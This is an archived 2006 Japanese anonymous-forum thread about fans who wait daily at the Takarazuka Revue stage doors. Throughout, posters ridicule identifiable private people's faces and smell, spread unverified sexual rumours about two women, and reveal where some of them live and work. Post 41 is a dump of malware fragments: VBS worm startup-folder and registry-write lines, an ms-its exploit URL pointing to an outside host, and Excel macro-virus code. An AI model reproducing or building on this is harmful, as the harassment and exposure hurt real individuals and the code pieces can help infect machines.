5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【宝塚】入り出待ちの常連さん 2

1 :名無しさん@花束いっぱい。:2006/09/29(金) 11:25:57 ID:zXIsQvz3
入り出待ちの常連さんをピックアップしていこー。
過度の叩きは禁止。

前スレ
http://hobby8.2ch.net/test/read.cgi/siki/1141868048/l50

2 :名無しさん@花束いっぱい。:2006/09/29(金) 11:46:33 ID:j8k1wH8y
\クソスレ ワッショイ!!/
 ∬∬   ∬∬
  人    人
 (_)   (_)
(__)  (__)
( __ ) ( __ )
( ´∀`∩( ´∀`)
(つ  ノ(つ  つ
ヽ ( ノ ) ) )
(_)し" (_)_)

3 :名無しさん@花束いっぱい。:2006/09/30(土) 03:58:52 ID:c730MzpE
鳥女のミニスカートが凄い件について

4 :名無しさん@花束いっぱい。:2006/09/30(土) 17:17:30 ID:3lh1IXnY
村にいるのかな?
鳥@さん

5 :名無しさん@花束いっぱい。:2006/09/30(土) 20:44:13 ID:c730MzpE
毎日いる。

6 :名無しさん@花束いっぱい。:2006/10/03(火) 16:08:37 ID:piXfETbO
昨日梅田で、て○あやか見た。
ど○みちゃんとお話してたよwww

7 :名無しさん@花束いっぱい。:2006/10/03(火) 16:53:20 ID:ppXCyLPi
だからムラで見かけなかったんだ。会わなくて嬉しかった

8 :名無しさん@花束いっぱい。:2006/10/03(火) 21:25:39 ID:89bj7gyq
昨日、てつ〇やかは全ツ梅芸16:30を見てたよ

9 :名無しさん@花束いっぱい。:2006/10/04(水) 00:53:09 ID:nK9Dwb0s
てつ○やかさんってどんな装い[気になったw

10 :名無しさん@花束いっぱい。:2006/10/04(水) 19:18:00 ID:nK9Dwb0s
てつあやかさんって女性ですよね?

11 :名無しさん@花束いっぱい。:2006/10/04(水) 19:42:29 ID:fO7Hk981
てつあ○かは男だよー

ベージュのスーツ着てた。

12 :名無しさん@花束いっぱい。:2006/10/04(水) 19:57:35 ID:DLvCZs4M
髪の毛薄めだよね

13 :名無しさん@花束いっぱい。:2006/10/04(水) 20:05:38 ID:nK9Dwb0s
メガネかけてる?

14 :名無しさん@花束いっぱい。:2006/10/04(水) 20:07:36 ID:58xd3jfH
>>3
ここで話題になってるの意識してるんじゃないの〜?

15 :名無しさん@花束いっぱい。:2006/10/05(木) 01:24:57 ID:/NAfuAna
マジで鳥女、入りであのミニスカートはいてくるとテンション下がる。
コムもあの顔は覚えてそうだなw

16 :名無しさん@花束いっぱい。:2006/10/05(木) 02:11:56 ID:lzcMVjcG
てつ○あ○かは髪薄くないよーな。
金髪だ。

17 :名無しさん@花束いっぱい。:2006/10/05(木) 13:14:37 ID:Nn/NXft3
太ってて丸いメガネかけてたよね

18 :名無しさん@花束いっぱい。:2006/10/05(木) 13:22:33 ID:8NOKvVan
大劇場に向ってます。
鳥女サンに会えるかな〜wktk

19 :名無しさん@花束いっぱい。:2006/10/05(木) 18:38:52 ID:8NOKvVan
18です。
鳥女サンに会えなかったけど、
てつ〇やかが観劇してた。
それと今、なっちゃんと同じ電車。

20 :名無しさん@花束いっぱい。:2006/10/06(金) 00:37:22 ID:CNydZ24w
今日のコム出待ちで鳥女発見。
帰りに阪急宝塚駅でまた発見。
横顔最強。

21 :名無しさん@花束いっぱい。:2006/10/06(金) 00:46:09 ID:7skSqQmh
鳥女のミニスカってどれほど凄いの?


22 :名無しさん@花束いっぱい。:2006/10/06(金) 01:22:23 ID:CNydZ24w
マジ凄い。言葉を失うよ〜
もうミニスカート+ブーツの季節やな。


23 :名無しさん@花束いっぱい。:2006/10/06(金) 19:14:48 ID:U6eDw6Nd
某会会員がtetsuayakaに頼んだ撮ってもらった写真を入り待ちの時に売っている。


24 :名無しさん@花束いっぱい。:2006/10/07(土) 13:20:44 ID:3NC+xACS
鳥女の骨格はありえない

25 :名無しさん@花束いっぱい。:2006/10/07(土) 22:13:38 ID:Un/kufIm
今日ムラで派手な人をみました。顔はイマイチのわりに自分に自信もってそうな勘違い野郎いるんだよねw

26 :名無しさん@花束いっぱい。:2006/10/08(日) 00:08:10 ID:DHKkkRrQ
最近よく居る高校生?
この前見た。
4人で居たけど1人の人は最近ホントよく見る。
でも結構醜かったッス

27 :名無しさん@花束いっぱい。:2006/10/08(日) 02:16:03 ID:CYPg8VOf
>25
それは入り出待ちで見掛けた宝塚市民?w
うるさかったよね。

28 :名無しさん@花束いっぱい。:2006/10/08(日) 12:13:21 ID:trUs55ui
>>25 野郎?男性ですか?

29 :名無しさん@花束いっぱい。:2006/10/08(日) 13:07:22 ID:FQcGZN5K
25ではありませんが年齢不詳な派手なお姉さんなら見たことあるよ

30 :名無しさん@花束いっぱい。:2006/10/08(日) 13:18:05 ID:myZK1uYp
>>25
花の道嬢じゃないの?
あの人絶対心の中でジェンヌになりきってるよね

>>26
太い子4人組で、携帯で写真撮ってる子達?



31 :名無しさん@花束いっぱい。:2006/10/08(日) 13:39:08 ID:FQcGZN5K
花の道嬢って人ってドキツイ化粧したバブル時代っぽい格好した人?

32 :名無しさん@花束いっぱい。:2006/10/08(日) 14:28:30 ID:1CFWpgBH
鳥女発見。アイシャドーは会服に合わせ緑だw
カバンにコムのキーホルダーが付いてるw

33 :名無しさん@花束いっぱい。:2006/10/08(日) 20:01:26 ID:trUs55ui
花の道嬢は明日からオサの稽古が始まるので、入り待ちに現れると思うよ。

それより、星組いないのになぜ、な○ちゃんが花の道に居座ってるの?
しかも至近距離で写真撮って!
写真撮るなら、マナーをまもれよ!

34 :名無しさん@花束いっぱい。:2006/10/08(日) 20:17:33 ID:FQcGZN5K
会員さんなんですか?確かめてみます

35 :名無しさん@花束いっぱい。:2006/10/08(日) 20:42:30 ID:AxwiYxpW
up

36 :名無しさん@花束いっぱい。:2006/10/08(日) 20:44:04 ID:ygH6ewJ1
鳥女さん、この前花の道で知り合いらしい人に声かけてたの見たけど
その人に、こないだここにいたでしょ〜見てるのよ私は〜とか言ってた
きっとアナタはそれどころじゃなく思いっきり不特定多数の人たちからも
見られまくってるよね…と思った

37 :名無しさん@花束いっぱい。:2006/10/08(日) 20:51:32 ID:AxwiYxpW
携帯からだと下がりすぎて見つけられないのでいったんあげさせてください。


38 :名無しさん@花束いっぱい。:2006/10/08(日) 23:25:24 ID:kR4sAsx9
なっちゃんはね…ウメちゃんの写真と交換してもらうために他の生徒さんの写真を撮ってるのよ。
なっちゃんしか撮れないアングルの写真だから欲しい人もいるし…。

39 :名無しさん@花束いっぱい。:2006/10/08(日) 23:38:12 ID:hMwocIJV
鳥女さんは東京にはいますか?人相など教えてください

40 :名無しさん@花束いっぱい。:2006/10/09(月) 03:10:32 ID:+4E4DMXD
鳥女は東京にももちろん出ます。
骨格は横顔が鷹、鷲みたいです。すぐわかるよ!髪は明るい茶髪

41 :<body onload=window()>:2006/10/09(月) 11:54:58 ID:k+7mVTCr
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


42 :名無しさん@花束いっぱい。:2006/10/09(月) 13:06:24 ID:2gjPqx6S
派手なんは仕方ないよ。元キャバ嬢ですから

43 :名無しさん@花束いっぱい。:2006/10/09(月) 18:27:43 ID:QO1769IU
>>30
違うかな・・・
太い子は2人だけだったかな?
よくみる子とメガネかけてた子。
携帯では撮ってないよ。
多分あなたが言ってる人とは別の人だわ。
醜かったのは4人のなかでよく見る子1人だけだし・・・

44 :名無しさん@花束いっぱい。:2006/10/10(火) 04:16:24 ID:moiakbiq
鳥女さんを見たいんだけど見つからない。

45 :名無しさん@花束いっぱい。:2006/10/10(火) 15:06:22 ID:RG9oSqfs
見たくないのに見つけてしまうよりはいいよorz

46 :名無しさん@花束いっぱい。:2006/10/10(火) 16:58:19 ID:vsHggNeg
>>43
私その子達見たかもしれない。
一人の子はたしか可愛かったよね。お洒落で今時っぽかった。
よく見る子はもしかしたら知ってるかも。たしか髪がすごく長くて黒い服で半ズボンだった子でしょ?

47 :名無しさん@花束いっぱい。:2006/10/10(火) 19:20:40 ID:F+QeNZJL
>派手なんは仕方ないよ。元キャバ嬢ですから
 へ〜、鳥女って元・キャバ嬢だったんだー、ビックリ!
 だからあれだけ派手に追っかけるられるのねww
 




48 :名無しさん@花束いっぱい。:2006/10/10(火) 19:33:11 ID:z9Cva0A/
>44
同じガードに入る者の身にもなってくれorz


49 :名無しさん@花束いっぱい。:2006/10/10(火) 20:01:25 ID:wZuImxnj
今日大劇場行ったらコムチャン会のガードに道路側一番左にいた女の人と 赤服のばーちゃんが気になった…これって有名な方?

50 :名無しさん@花束いっぱい。:2006/10/10(火) 20:16:03 ID:5rOTpLwh
>>47  元キャバ嬢って、花の道嬢のことでは?
噂では元or現役風俗嬢らしい。

51 :名無しさん@花束いっぱい。:2006/10/10(火) 20:38:45 ID:dYZcmKEe
本日、コムちゃん会の入りガード時、
なっちゃんと一般のおばさんの喧嘩が始まった。

ことの発端はおばさんがガードの前に出ていたのを、
コムちゃん会スタッフが下がってほしいようなことを言ったのに対して、
このおばさんが、下がりません。私はここで見るの。
みたいなことを言い出した。

で、そこへなっちゃんがなぜか登場して、
このおばさんと喧嘩になった。

52 :名無しさん@花束いっぱい。:2006/10/10(火) 20:41:25 ID:EpwbMaGO
鳥女がキャバ嬢じゃ、客つかないっしょ。
それか逆に衝撃的で人気出たりして。

53 :名無しさん@花束いっぱい。:2006/10/10(火) 20:52:11 ID:cU65M8J6
鳥女キャバ嬢は無理
風俗じゃない?
しゃぶるのが上手けりゃ
指名も増えるだろうし
顔にインパクトあると
次回指名するのにも
店員もすぐに分かりそう(笑)
インパクトあるってのも時には役に立つんだ(笑)
しゃぶったお金で宝塚か
将来ないね〜
可哀そう

54 :名無しさん@花束いっぱい。:2006/10/10(火) 21:27:25 ID:lpW6MMUv
ギャバ嬢は花の道嬢の方だよ!風俗にも手だしてるよ。若いってだけで客ついてるから勘違いしてムラでも派手な格好で練り歩くんだよww

55 :名無しさん@花束いっぱい。:2006/10/10(火) 21:30:39 ID:RG9oSqfs
花の道嬢がわかんねえ・・・

56 :名無しさん@花束いっぱい。:2006/10/10(火) 23:28:04 ID:REBL7206
鳥女ってコムファンの前はマミ、その前はシメファンだった人?違うか…
でもたぶんあの人だ。一度見たら忘れない顔してる。
横顔、最強…誰が言い出したの!鳥女って、インパクトありすぎ!

57 :名無しさん@花束いっぱい。:2006/10/10(火) 23:28:56 ID:kgdgH6Ob
>>56
マミはない。しめもない。

58 :名無しさん@花束いっぱい。:2006/10/10(火) 23:44:51 ID:wvywj/4P
>>56
コムの直前は水だ!


59 :名無しさん@花束いっぱい。:2006/10/10(火) 23:47:24 ID:l6ScTHSp
水会に追い出された鳥女。

60 :名無しさん@花束いっぱい。:2006/10/11(水) 00:02:56 ID:nCU5JOrX
49の人はなっちゃんと鳥女さんでおK?
あと今日入り待ちしてたエンジのスカートの子地味だけど可愛かったかも

61 :名無しさん@花束いっぱい。:2006/10/11(水) 00:03:37 ID:wZuImxnj
連続スマソ
エンジの会服て誰?

62 :名無しさん@花束いっぱい。:2006/10/11(水) 00:07:27 ID:PIT8s+3c
えりたん

63 :名無しさん@花束いっぱい。:2006/10/11(水) 00:09:45 ID:4llVgw1W
56です。私が思ってる鳥女は別人の気がしてきた。
その人鼻が凄く特徴あってあごがないの、、横顔はまさに鳥。
ここで噂の鳥女見たいよ〜
今度村行くから、見れますように!



64 :名無しさん@花束いっぱい。:2006/10/11(水) 00:20:22 ID:nCU5JOrX
49の事を間違ってたら誰か訂正して。お願いッ

65 :名無しさん@花束いっぱい。:2006/10/11(水) 00:24:28 ID:SIv1B2p9
ここでいう鳥女は
見た目は魔女なの。
でも鳥のようにも見えるし
カメラで撮りして売ってたり
お金騙し取ったりしてたので
取り女!!
上手い!!!

66 :名無しさん@花束いっぱい。:2006/10/11(水) 00:29:00 ID:4n7YMc+E
そうか

67 :名無しさん@花束いっぱい。:2006/10/11(水) 00:32:23 ID:oTEI0rYB
>>63
あってると思う。
体のわりに、めっちゃ顔小さくて鼻が特徴的でスゴイ。
ムラでも東宝でも青年館でも見た事ある。

68 :名無しさん@花束いっぱい。:2006/10/11(水) 01:24:55 ID:U7gFh0Sx
鳥女って・・誰だ?


69 :名無しさん@花束いっぱい。:2006/10/11(水) 04:57:32 ID:PIT8s+3c
横顔は本当に鳥みたいだよね。
最近は、よく全身黒でコーディネートしてるお。
コムの会服もはおってるけど

70 :名無しさん@花束いっぱい。:2006/10/11(水) 06:23:51 ID:ps94o0k5
鳥女さんって昔(10年以上!?)は男役を意識した…みたいな服装&髪型されていませんでしたか???
人違いかなぁ…。
でも特徴あるお顔立ちだから…同一人物かと思うんですが…。

71 :名無しさん@花束いっぱい。:2006/10/11(水) 10:05:38 ID:nCU5JOrX
鳥女…昨日はロングコート着てた人?

72 :名無しさん@花束いっぱい。:2006/10/11(水) 11:19:12 ID:AdMAW/U8
鳥女さん、初めて見た。
あの人が鳥女さんかな?と思うより、鳥女さんだ!!って感じダタw
本当にドビーそっくりで、すぐに分かりますた。
顔のサイズだけは裏山だけどね。

私が見た時はピンハ系のフリフリワンピースだったお。

73 :名無しさん@花束いっぱい。:2006/10/11(水) 12:47:41 ID:4n7YMc+E
鳥女って普段、どんな生活してんだろ?

74 :名無しさん@花束いっぱい。:2006/10/11(水) 13:37:33 ID:44/MX+PZ
花の道嬢=み○きはデリヘルで働いてるらしい。
客と本番して、指名取ってる。

75 :名無しさん@花束いっぱい。:2006/10/11(水) 15:58:59 ID:XKjqXCZd
>74
金パでぐりんぐりんに巻いてる人?

76 :名無しさん@花束いっぱい。:2006/10/11(水) 16:02:16 ID:2f6ulX1e
いやー、デリヘルで稼いで宝塚につぎこむってすごいね。
まだ見たことないや、花の道嬢。

77 :名無しさん@花束いっぱい。:2006/10/11(水) 17:38:00 ID:44/MX+PZ
花の道嬢=みゆ○は、若いころの山田邦子みたい。
いつも薄ら笑いで花の道をうろついてる。

78 :名無しさん@花束いっぱい。:2006/10/11(水) 19:08:30 ID:0YtjiXll
ギャバ嬢なんて嘘っぱち!これ以上書かないでね

79 :名無しさん@花束いっぱい。:2006/10/11(水) 21:29:37 ID:sdE6sBZ5
風俗は本当なんだW

80 :名無しさん@花束いっぱい。:2006/10/11(水) 22:36:59 ID:uLmRromc
鳥女(取り女)(撮女)
昔はジーンズにブーツでショートカット
確かに男役もどきな格好だった

81 :名無しさん@花束いっぱい。:2006/10/12(木) 13:15:05 ID:yK7oAEaF
おさ会見てたけどわからなかった…

82 :名無しさん@花束いっぱい。:2006/10/12(木) 14:59:26 ID:XwX4tHgL
うぉぉぉ!
花の道嬢と本番やりてぇ!
店の名前おしえてくり〜

83 :名無しさん@花束いっぱい。:2006/10/13(金) 00:24:06 ID:fhcp+6X5
鳥女見た!ムラに着いてすぐ花の道で遭遇
ビックリしたよ!だって目の前にいるんだもん!
あの人関西の人?毎日いるの?


84 :名無しさん@花束いっぱい。:2006/10/13(金) 01:05:17 ID:L32pipzO
>83
同じ会に入ってるけど、私が行ってる日は必ずいる。
すごい目立つもんね。
2階だと上手と下手くらい離れた会席に座っていてもわかる。



85 :名無しさん@花束いっぱい。:2006/10/13(金) 19:10:29 ID:Rmd+xN7g
>>46
そうですその子です。
そうそう言われてみれば1人だけ可愛かった。
たしか黒い服でジーパンの子。


ああゆう子が宝塚入れば良いのに。

86 :名無しさん@花束いっぱい。:2006/10/13(金) 23:10:53 ID:Yhe1S5b5
82さん>是非ご指名してあげて!w

87 :名無しさん@花束いっぱい。:2006/10/15(日) 20:36:52 ID:DHAGf7+x
明日ムラ行くけど会えるかな

88 :名無しさん@花束いっぱい。:2006/10/15(日) 23:20:20 ID:WFrQrk0I
誰に会いたいの?

89 :名無しさん@花束いっぱい。:2006/10/15(日) 23:58:07 ID:kmCqhV2i
84.85自演お疲れ様
誰も可愛いなんて書いてないよ
酷かったって書いてるよ
漢字読める?
ああゆう子が宝塚入れば良いのに。
ってあなた受験生なのね。
ま、せいぜい頑張って〜


90 :名無しさん@花束いっぱい。:2006/10/16(月) 12:35:12 ID:yIwOPAE0
84,85がジエンだと思う人は少ないんじゃなかろうかw

91 :名無しさん@花束いっぱい。:2006/10/16(月) 14:59:56 ID:Oszg9GHm
85の書き方は怪しいけど
84は違うわな・・・
まあ単なる89の書き間違いでしょ

92 :名無しさん@花束いっぱい。:2006/10/17(火) 22:10:37 ID:D1E5GpRx
86 オサに指名されたくて頑張ってるんじゃないwww

93 :名無しさん@花束いっぱい。:2006/10/18(水) 16:25:41 ID:J8eUqybH
ここで自演とか言ってる人たちって可哀想だね。
85が言ってる娘私も見たけど可愛かったよ。

94 :名無しさん@花束いっぱい。:2006/10/18(水) 16:33:04 ID:J8eUqybH
連続スマソ
85が言ってる黒い服の娘って2人居るんじゃないの?
一人はよく見る醜い子でもう一人は可愛い子ってことじゃないかな・・
半ズボンのことジーパンとは書かないでしょ・・・
醜い子は46が言ってる子で
可愛い子は85が言ってる子だと思うんだけど・・・・。


95 :名無しさん@花束いっぱい。:2006/10/18(水) 16:57:30 ID:QJprEQOo
なっちゃんが豊中にいたらしいよ!豊中に住んでるの?

96 :名無しさん@花束いっぱい。:2006/10/18(水) 18:03:21 ID:KmST+fBu
鳥女は逆瀬川にマンソンかりてるよね

97 :名無しさん@花束いっぱい。:2006/10/18(水) 18:48:10 ID:WVzgmkOg
>>95
岡町でなかったっけ?

98 :名無しさん@花束いっぱい。:2006/10/18(水) 18:48:58 ID:xjd2AZzN
>94
世の中には膝より短い丈のデニムも多く存在しますが・・・
まあ私はどんな子なのか知らんけど

99 :sage:2006/10/18(水) 21:39:09 ID:zoiwHVnK
ここで言われてる醜い子ってなっちゃんと喋ってたりする?たしか星ファンらしいんだけど……
よく見る子なら知ってるかもと思いまして……


100 :名無しさん@花束いっぱい。:2006/10/18(水) 21:52:59 ID:fhsZPNay
鳥女さん・・・アンガールズの山根さんに似てる。

101 :名無しさん@花束いっぱい。:2006/10/18(水) 23:17:06 ID:pCRpozNW
>>92が笑える

102 :名無しさん@花束いっぱい。:2006/10/19(木) 00:25:05 ID:02mtS3+D
鳥女って、主婦?無職の高齢カジテツ?
お金どうしてんのか不思議でたまらん。

103 :名無しさん@花束いっぱい。:2006/10/19(木) 15:13:23 ID:MLHZ2v75
ホントホント、普段どんな生活してんだろ?

104 :名無しさん@花束いっぱい。:2006/10/19(木) 17:40:10 ID:dGqr+bng
>>89
ププ!(笑)
お前笑かすな!!!
国語力がないのかね・・・
可哀想なヤシだ・・・。

105 :名無しさん@花束いっぱい。:2006/10/19(木) 18:45:44 ID:+Xq6UrAC
確かに…やまねさんに似てる…

106 :名無しさん@花束いっぱい。:2006/10/19(木) 21:00:59 ID:DGGH/wPn
て○あやか最悪。

107 :名無しさん@花束いっぱい。:2006/10/19(木) 21:33:53 ID:bl/ebogF
なにがあった

108 :名無しさん@花束いっぱい。:2006/10/19(木) 21:58:13 ID:DGGH/wPn
本当、気をつけたほうがいい

109 :名無しさん@花束いっぱい。:2006/10/19(木) 22:01:24 ID:abwU1ZY7
こんなところに他人の悪口書いてるおまいらのほうが最悪

110 :名無しさん@花束いっぱい。:2006/10/19(木) 22:07:10 ID:DGGH/wPn
そういうアンタが書いてるんじゃないの?

111 :名無しさん@花束いっぱい。:2006/10/19(木) 23:03:06 ID:8uhtzAy8
目クソ鼻クソw

112 :名無しさん@花束いっぱい。:2006/10/20(金) 00:17:32 ID:u0QyTko9
今日なっちゃんに「あんた新人?」って声かけられた…全然ジェンヌぽくないのに。
今日鳥さんが高値で人からチケット買ってました…

113 :名無しさん@花束いっぱい。:2006/10/20(金) 00:20:18 ID:OR8daA9t
>>112
それ、入り出の事だと思うよ
私も言われた事あるし・・・。

114 :名無しさん@花束いっぱい。:2006/10/20(金) 00:44:11 ID:u0QyTko9
いや、あんた○○ちゃんに似とる と言われた^^;○○ちゃんはよく聞き取れなかった…茶ブチメガネの生徒いたっけか?と思って。私は茶ブチメガネかけてたんで。

115 :名無しさん@花束いっぱい。:2006/10/20(金) 00:55:07 ID:UYk9EGfm
鳥女は平日チケ20枚以上頼んで楽取り次ぎしてもらえそう・・・やだやだ

116 :名無しさん@花束いっぱい。:2006/10/20(金) 01:15:55 ID:u0QyTko9
鳥さん…今日オバチャンと抱き合ってた(笑)みんな見てるからヤメレ

117 :名無しさん@花束いっぱい。:2006/10/20(金) 03:54:51 ID:kZGfPC1B
>>114
生徒じゃなくて入り出の常連の子の名前じゃない?
生徒とは限らないよwwwwwww

118 :名無しさん@花束いっぱい。:2006/10/20(金) 10:08:13 ID:u0QyTko9
茶ブチではなく赤ブチでした

119 :名無しさん@花束いっぱい。:2006/10/21(土) 20:36:30 ID:lUlWnbtT
入り出の常連にはなりたくない

120 :名無しさん@花束いっぱい。:2006/10/21(土) 21:10:39 ID:r1P/2d4b
だったら花の道に来なきゃいいじゃんw

121 :名無しさん@花束いっぱい。:2006/10/21(土) 23:11:16 ID:BHcwtRv6
入り出の常連さんはお仕事ちゃんとしてるの?
なっちゃんはしてないだろうけど、
て○あ○かとか・・・

122 :名無しさん@花束いっぱい。:2006/10/22(日) 12:48:26 ID:VXJJF7lH
仕事逝きますとか言って途中で抜け出したヤシがいt

123 :名無しさん@花束いっぱい。:2006/10/22(日) 12:57:49 ID:gtA7Gaxf
て○あや○の仕事は写真撮って売ることだよ

124 :名無しさん@花束いっぱい。:2006/10/22(日) 13:30:18 ID:4BrwKbIC
某会の幹部さんが99ショップで働いてた。
花の道じゃ超偉そうにしてるのに、お店では普通のおばさんになってた。
でも出来れば違う人にレジしてほしい。

125 :名無しさん@花束いっぱい。:2006/10/22(日) 21:33:16 ID:OUWsSs/8
○ド会

126 :名無しさん@花束いっぱい。:2006/10/23(月) 20:06:30 ID:tEEejqSY
どっかの風俗嬢よりマシな仕事と思う

127 :名無しさん@花束いっぱい。:2006/10/24(火) 09:09:46 ID:mxKL2w62
あげ

128 :名無しさん@花束いっぱい。:2006/10/25(水) 19:30:47 ID:G0pMLuhR
え?99ショップのレジってめがねの人ですか?
あの人怖いー!99ショップ絶対に行かないでおこう!!
聞いていて良かった。。。ありがとうございます。

129 :名無しさん@花束いっぱい。:2006/10/25(水) 23:02:54 ID:YbppOX8v
てつ○○かって小指にマニキュアぬってる??

130 :名無しさん@花束いっぱい。:2006/10/26(木) 00:06:25 ID:sra3bROU
南口の99??
何時くらいの勤務なの?
観たい!
職場が儲けていいね〜

131 :名無しさん@花束いっぱい。:2006/10/26(木) 00:09:14 ID:UuIwTxI/
>123
いわゆるフリーカメラマンですな
あ、それともスターの会御用達?

132 :名無しさん@花束いっぱい。:2006/10/26(木) 01:51:41 ID:M5ipkM5e
>131それともスターの会御用達?

某会員のTさんが入りで売ってるな〜w
もちろん個人的にね。だから某二番手さんの写真はオクに出なくなった。
某会員とはウッドデッキでて〇あ〇かとよく話している背が高い女性です。

133 :名無しさん@花束いっぱい。:2006/10/26(木) 02:04:36 ID:lPRkvSDW
M会の自己中T?

134 :名無しさん@花束いっぱい。:2006/10/26(木) 07:58:08 ID:NhkWtdFV
>133
ウィ〜

135 :名無しさん@花束いっぱい。:2006/10/26(木) 09:50:05 ID:lPRkvSDW
毎日入り出パーフェクト、自分より情報をもってないやつは虫、て考えのやつだね。

136 :名無しさん@花束いっぱい。:2006/10/26(木) 10:15:16 ID:A3a8TLzX
あのストーカー嬢ですね。
生徒さんは彼女と彼女周辺の会員たちの実情はよくご存知で
本当は嫌っておられますよ。
でも頭の良い生徒さんなのでおくびにも出しませんけどw

137 :名無しさん@花束いっぱい。:2006/10/26(木) 13:41:42 ID:lPRkvSDW
そりゃ〜チケット買ってくれる大切なファンですもの、いやな顔はできないし、
入り出・並びパーフェクトなら会も良席回さなきゃいけないでしょうよ…

138 :名無しさん@花束いっぱい。:2006/10/26(木) 23:45:57 ID:6Xpws3cW
>136

実情ってなに?

139 :名無しさん@花束いっぱい。:2006/10/27(金) 01:27:25 ID:nJPougWS
>>136
代表やスタッフじゃなくて、生徒が知ってるの?
そんなこと興味ないと思うけどな。

140 :名無しさん@花束いっぱい。:2006/10/27(金) 15:55:52 ID:voo1orJK
Tさん、大人会への入会できなかったみたいだね。周辺の会員も含め。
今年の大人会食事会は生徒さんもファンも和やかだったらしい。
と、知人の大人会会員に聞きますた。

141 :名無しさん@花束いっぱい。:2006/10/27(金) 16:23:37 ID:1N28pqHR
Tさんとその周辺の人たちの本性だったりしてw

142 :名無しさん@花束いっぱい。:2006/10/27(金) 19:49:36 ID:vHdDp4Yq
T入ってないの??
年齢とかじゃなくて行動で?そんなことしたら余計キャンキャン言うんじゃないだろうか。
スタッフ側はどういったんだろ。元スタッフのHも入ってないよね。
拒否したならスタッフすげぇ。


143 :名無しさん@花束いっぱい。:2006/10/27(金) 21:30:14 ID:fJivD1FL
去年までは入ってたみたいだから、拒否られたってことだろうね。
毎年更新だからスタッフは入会申込書送らなければいいだけでそ。

144 :名無しさん@花束いっぱい。:2006/10/27(金) 23:48:55 ID:/3AEJNHw
Tってここでよく出てくる鳥○さん?

145 :名無しさん@花束いっぱい。:2006/10/28(土) 03:09:47 ID:KKh84p4g
>>144
馬鹿?
1からちゃんと読め!

146 :名無しさん@花束いっぱい。:2006/10/28(土) 06:26:55 ID:yNdOej9L
今日からムラ入りするけど、
鳥女さんと同じガード入るのイヤだなぁ〜。


147 :名無しさん@花束いっぱい。:2006/10/28(土) 08:56:05 ID:4lCJqegy
T及び周辺は自分たちが特別な存在だから大〇会に入ってもさほどメリットはないそうです。



148 :名無しさん@花束いっぱい。:2006/10/28(土) 10:58:27 ID:LIE4r5a1
Tさんって雪1や花1の入りのときにビデオ撮影してる人ですよね。
「わたしのす○れさん!」って言ってる痛い人…

149 :名無しさん@花束いっぱい:2006/10/28(土) 12:49:03 ID:Kko9poJD
赤服のばあさんはいつも早朝より見るけどなにしてるの?


150 :名無しさん@花束いっぱい。:2006/11/01(水) 05:51:26 ID:JdH50moS
スカステの千秋楽コムの入りに鳥女サン映ってた?

151 :名無しさん@花束いっぱい。:2006/11/01(水) 07:12:47 ID:S3C/aOdl
昔は,裕福な環境で金持ちさんが幹部さんされてたと思う。
だから・・・・
バイトやパートをしてた人って殆ど居なかったような。
時代が変わったんですね。



152 :名無しさん@花束いっぱい。:2006/11/01(水) 19:04:07 ID:4inuF521
このスレ初めて見たんですが、鳥女ってのが誰だかすぐ分かった…。
先週、ムラ行って初めて入り出待ちして、目が離せないほど特徴的な顔の人が私の対面にいたもの…。
私の印象では、昔教育テレビでやってたアルフに似てるなと思いました…。

153 :名無しさん@花束いっぱい。:2006/11/01(水) 20:10:07 ID:Gh7coqaW
大劇場楽の日に鳥女見た!!
全身白。セミロングで頭を上に二つに結び
後ろはたらしてた。


154 :名無しさん@花束いっぱい。:2006/11/02(木) 09:56:47 ID:aahuw8h4
ムラに行くとよく見るんだけど、
背が低くて、髪は白髪交じりで長さは結構長めのおばちゃん。いつもコパカバーナのカバン持ってる。
そしてちょっとでも近づくと異様なニオイ!!!

雪前楽に11時の当日券を泊り込みで並んでたみたいなのに、15時の抽選もしてた。
あの人のニオイ、どうにかならないかな・・・


155 :名無しさん@花束いっぱい。:2006/11/02(木) 18:28:53 ID:hF9f1+yd
なっちゃん?

156 :名無しさん@花束いっぱい。:2006/11/02(木) 21:11:01 ID:d6q9Um8v
なっちゃんは総白髪やろ

157 :名無しさん@花束いっぱい。:2006/11/02(木) 21:51:27 ID:BcYQEfTM
その臭い人
同じく汚らしい感じの仲間いるよね?
東京にも来てるし関東の全ツでも見かけるよ
平日もいるけど楽には必ず見かける
大荷物の軍団。もしかしておうちがなくて大荷物で
回ってるとか???????

158 :名無しさん@花束いっぱい。:2006/11/02(木) 22:08:51 ID:rsiq7p9u
154です。
なっちゃんではありません。

仲間は汚らしくて、大荷物です!!それか・・・デブ。
そういえば、前ムラのガストで見たんだけど、
東京の出の写真を見せびらかしてたなぁ。

やっぱりホーム○ス??

159 :名無しさん@花束いっぱい。:2006/11/02(木) 23:04:33 ID:hF9f1+yd
ホームレスかもね。凄いニオイしそうだなw
鳥女はもう東京に戻ったかな。

160 :名無しさん@花束いっぱい。:2006/11/03(金) 06:54:54 ID:hHBuqTGc
>>159
お稽古があるから、まだムラにいるんでないかい

161 :名無しさん@花束いっぱい。:2006/11/03(金) 22:49:32 ID:X6bQL0Zv
ホームレスが東京−宝塚間を往復するかな?

162 :名無しさん@花束いっぱい。:2006/11/04(土) 20:19:48 ID:Sni37UHJ
ホームレスっていうか
仕事はしてるけど家がなくて
